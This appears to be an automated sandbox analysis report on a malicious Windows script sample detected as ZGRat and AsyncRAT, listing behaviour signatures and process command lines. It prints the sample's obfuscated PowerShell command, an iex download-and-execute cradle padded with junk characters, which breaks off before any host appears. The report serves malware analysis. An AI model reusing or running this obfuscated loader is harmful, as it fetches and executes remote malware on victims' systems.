Analysis Overview
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Threat Level: Known bad
The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3) was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
ZGRat
AsyncRat
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-25 11:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-25 11:33
Reported
2024-01-25 11:36
Platform
win7-20231215-en
Max time kernel
140s
Max time network
120s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM *aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦